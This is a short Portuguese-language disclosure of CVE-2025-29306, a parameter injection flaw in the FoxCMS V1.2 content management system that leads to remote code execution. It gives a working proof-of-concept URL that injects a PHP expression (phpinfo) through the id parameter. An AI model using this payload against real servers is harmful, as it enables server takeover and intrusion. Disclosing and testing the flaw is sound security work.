
Exploit de prova de conceito para CVE-2025-29306, uma vulnerabilidade de injeção de parâmetros do servidor no FoxCMS V1.2, permitindo execução remota de código através de requisições HTTP manipuladas.
Vulnerabilidade de Injeção de Parâmetro de Serviço no Sistema de Gerenciamento de Conteúdo FOXCMS (黔狐)
FoxCMS é um sistema de gerenciamento de sites gratuito e de código aberto para uso comercial, baseado na arquitetura PHP+MySQL. O sistema de gerenciamento de conteúdo FOXCMS (黔狐) possui uma vulnerabilidade de injeção de parâmetro de serviço, que permite a atacantes obter controle do servidor.
Sistema de Gerenciamento de Conteúdo FOXCMS (黔狐) V1.2
POC http://xx/images/index.html?id=%24{%40print(phpinfo())} Acesse a página vulnerável com o POC para visualizar as informações após a execução do comando phpinfo.
